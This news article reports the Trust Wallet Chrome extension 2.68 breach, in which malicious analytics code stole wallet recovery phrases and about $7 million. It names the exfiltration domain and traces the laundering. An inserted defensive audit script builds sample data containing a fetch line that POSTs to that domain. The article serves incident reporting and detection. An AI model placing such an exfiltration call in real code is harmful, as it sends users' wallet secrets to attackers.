Trust Wallet Chrome Extension Breach Results in $7 Million Cryptocurrency Theft via Malicious Code
By Ravie Lakshmanan | December 26, 2025 | Cryptocurrency / Incident Response
Trust Wallet, a widely used multi-chain, non-custodial cryptocurrency wallet service, has suffered a significant security breach impacting its Google Chrome extension. The company has confirmed that malicious code embedded in version 2.68 of the extension led to the theft of approximately $7 million worth of cryptocurrency. With nearly one million users affected, Trust Wallet is urging all Chrome extension users to immediately update to version 2.69 to mitigate further losses.
Incident Overview
The breach specifically affected users of the Trust Wallet Chrome extension version 2.68. According to the company, only this browser extension version is impacted; mobile users and other Trust Wallet platforms remain unaffected. Trust Wallet officially announced the incident via a post on X (formerly Twitter), assuring users that they are prioritizing refunding all those impacted by the attack.
“We’ve confirmed that approximately $7 million has been impacted and we will ensure all affected users are refunded,” the company stated. To begin the reimbursement process, affected users have been directed to complete a detailed claim form through Trust Wallet’s official support desk at trustwallet-support.freshdesk.com.
How the Attack Occurred
Blockchain cybersecurity firm SlowMist provided insights into the technical details of the attack. The malicious update introduced code designed to scan all wallets stored within the compromised extension. It then tricked users into entering their wallet’s mnemonic recovery phrase by generating unauthorized requests for this sensitive information. The attacker decrypted these mnemonics using passwords entered when unlocking the wallet and exfiltrated them to a server under their control at the domain api.metrics-trustwallet[.]com.
This rogue domain was registered only days before the attack, on December 8, 2025, with the first data exfiltration requests observed on December 21, 2025. The attackers also employed an open-source full-chain analytics library known as posthog-js, repurposing it for malicious data harvesting and facilitating information leakage through legitimate-looking analytics traffic.
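A defender-side check for the indicators this section names, added here as an example and not code from the article, SlowMist or Trust Wallet: it audits one unpacked Chrome extension folder for the compromised version number and for any bundled script or host permission that references the reported exfiltration domain. The Chrome profile path layout mentioned in the docstring and the sample extension files the script builds are assumptions constructed for the demonstration.

```python
import json
import re
import tempfile
from pathlib import Path

# Values taken from the incident write-up: only extension 2.68 carried the
# malicious analytics logic, 2.69 is the fixed release, and the domain is the
# exfiltration endpoint SlowMist reported (defanged on the page as api.metrics-trustwallet[.]com).
AFFECTED_VERSION = "2.68"
FIXED_VERSION = "2.69"
IOC_DOMAIN = "api.metrics-trustwallet.com"


def parse_version(text):
    """Turn '2.68' into (2, 68) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def audit_extension(ext_dir):
    """Return findings for one unpacked extension directory (assumed layout:
    a Chrome profile keeps each extension under Extensions/<id>/<version>/)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    version = manifest.get("version", "0")
    findings = []
    if parse_version(version) == parse_version(AFFECTED_VERSION):
        findings.append(f"version {version} is the compromised release; update to {FIXED_VERSION}")
    # The malicious build leaked mnemonics over analytics-looking HTTP traffic, so any
    # reference to the exfil domain in bundled scripts or host permissions is a red flag.
    ioc = re.compile(re.escape(IOC_DOMAIN), re.IGNORECASE)
    for perm in manifest.get("host_permissions", []) + manifest.get("permissions", []):
        if ioc.search(perm):
            findings.append(f"manifest grants host permission for {IOC_DOMAIN}")
    for script in sorted(ext_dir.rglob("*.js")):
        if ioc.search(script.read_text(encoding="utf-8", errors="ignore")):
            findings.append(f"{script.relative_to(ext_dir)} references {IOC_DOMAIN}")
    return findings


def build_sample(version, include_ioc):
    """Write a constructed, minimal unpacked extension to a temp dir (test data, not real code)."""
    root = Path(tempfile.mkdtemp())
    (root / "manifest.json").write_text(json.dumps({"manifest_version": 3, "version": version}))
    body = 'fetch("https://api.metrics-trustwallet.com/e", {method: "POST"});' if include_ioc else "export {};"
    (root / "analytics.js").write_text(body)
    return root


if __name__ == "__main__":
    for dirname in (build_sample("2.68", True), build_sample("2.69", False)):
        print(dirname, audit_extension(dirname) or ["clean"])
```

Point `audit_extension` at each version folder under the profile's Extensions directory; a non-empty result means the folder should be removed and the extension reinstalled at 2.69 or later.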
Impact and Fund Laundering
Funds stolen include a mixture of cryptocurrencies: approximately $3 million in Bitcoin (BTC), over $3 million in Ethereum (ETH), and a smaller sum in Solana (SOL). Blockchain investigator ZachXBT has confirmed that the attack has impacted hundreds of victims. PeckShield, a blockchain security company, detailed that while nearly $2.8 million of the stolen assets remain in the hacker’s wallets, more than $4 million has already been funneled to centralized exchanges (CEXs) such as ChangeNOW (~$3.3 million), FixedFloat (~$340,000), and KuCoin (~$447,000). The attackers have also utilized cross-chain bridges to launder and swap the stolen cryptocurrencies, complicating tracing efforts.
Origins and Possible Insider Involvement
Investigations reveal that the attack stemmed from direct manipulation of the Trust Wallet extension’s internal source code — specifically its analytics logic — rather than a compromised third-party library. SlowMist’s analysis suggests that the attacker used a leaked Chrome Web Store API key to bypass Trust Wallet’s normal release controls and push the malicious version 2.68 to the Chrome Web Store. The compromised extension was published on December 24, 2025, after passing Chrome’s review process.
Trust Wallet CEO Eowyn Chen indicated that the malicious version was “not released through our internal manual process” and highlighted ongoing investigations into how the attacker gained deployment permissions or access to developer devices. Industry speculation, including comments from Binance co-founder Changpeng Zhao, has hinted that the exploit was “most likely” an insider attack, although no conclusive evidence has yet been provided.
User Advisory and Scam Warnings
Trust Wallet has cautioned users to only rely on official communication channels and warned against phishing attempts. The company noted a rise in fake compensation forms, impersonation scams, and fraudulent Telegram advertisements targeting victims. Users are urged never to share their mnemonic recovery phrases or private keys under any circumstances and to verify any support communications carefully.
Steps Taken and Next Actions
Following the incident discovery, Trust Wallet promptly suspended the malicious domain, revoked all existing release APIs, and started processing reimbursements for victims. The company has identified 2,596 wallet addresses affected by the malicious update. However, with approximately 5,000 compensation claims submitted, Trust Wallet emphasized the importance of thorough wallet ownership verification to prevent fraud and ensure rightful reimbursement.
Eowyn Chen concluded, “Supporting affected users is our top priority. We continue to investigate and will evolve our security measures to prevent future incidents.”
What Users Should Do Now:
- Immediately update the Trust Wallet Chrome extension to version 2.69.
- Do not interact with unsolicited messages or forms claiming to be from Trust Wallet unless they originate from official channels.
- Submit claims for reimbursement only through Trust Wallet’s verified support desk: trustwallet-support.freshdesk.com.
- Never share your backup mnemonic phrase or private keys.
This breach underscores the crucial need for vigilance in the cryptocurrency ecosystem and highlights the growing risks posed by supply chain attacks, especially involving browser extensions managing sensitive wallet information.
© 2026 The Hacker News. All Rights Reserved.